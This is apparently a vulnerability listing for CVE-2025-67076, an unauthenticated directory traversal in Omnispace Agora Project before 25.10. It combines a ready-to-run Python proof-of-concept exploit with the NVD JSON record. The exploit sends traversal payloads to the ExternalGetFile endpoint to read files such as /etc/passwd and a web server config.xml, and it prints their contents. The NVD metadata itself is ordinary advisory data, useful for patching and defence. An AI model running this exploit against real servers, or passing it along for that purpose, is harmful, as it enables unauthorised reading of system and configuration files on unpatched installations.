CVE-2025-67076

import requests # CVE-2025-67076 PoC - Directory Traversal in Agora Project # Target: Omnispace Agora Project < 25.10 # Vulnerability: Unauthenticated file read via ExternalGetFile action def exploit_agoraTraversal(target_url, filename): """ Exploit directory traversal to read arbitrary files Args: target_url: Base URL of vulnerable Agora Project instance filename: Path to file to read (e.g., ../../../../etc/passwd) Returns: File contents if successful, None otherwise """ # Construct the vulnerable endpoint endpoint = f"{target_url}/misc/ExternalGetFile" # Payload with directory traversal params = { 'fileName': filename } try: # Send GET request without authentication response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Successfully read file: {filename}") print("-" * 50) print(response.text) return response.text else: print(f"[-] Failed to read file. Status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None # Example usage if __name__ == "__main__": target = "http://target-server.com/agora" # Read system files print("[*] Reading /etc/passwd...") exploit_agoraTraversal(target, "../../../../etc/passwd") print("\n[*] Reading configuration file...") exploit_agoraTraversal(target, "../../../../var/www/html/config.xml")

{"cve": {"id": "CVE-2025-67076", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:11.650", "lastModified": "2026-01-21T14:45:48.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directory traversal vulnerability in Omnispace Agora Project before 25.10 allowing unauthenticated attackers to read files on the system via the misc controller and the ExternalGetFile action. Only files with an extension can be read."}, {"lang": "es", "value": "Vulnerabilidad de salto de directorio en Omnispace Agora Project anterior a 25.10 que permite a atacantes no autenticados leer archivos en el sistema a través del controlador misc y la acción ExternalGetFile. Solo se pueden leer archivos con una extensión."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:agora-project:agora-project:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.10", "matchCriteriaId": "03FDD8D6-01A9-4C64-9893-65C744702416"}]}]}], "references": [{"url": "https://www.agora-project.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.helx.io/blog/advisory-agora-project/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}